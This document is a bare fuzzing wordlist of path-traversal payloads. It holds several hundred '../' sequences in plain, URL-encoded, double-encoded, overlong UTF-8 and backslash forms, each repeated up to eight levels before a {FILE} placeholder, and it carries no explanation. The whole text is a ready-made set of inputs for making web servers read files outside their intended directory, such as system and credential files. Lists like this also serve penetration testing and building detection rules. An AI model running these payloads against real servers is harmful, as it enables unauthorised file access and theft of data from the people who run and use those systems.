..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
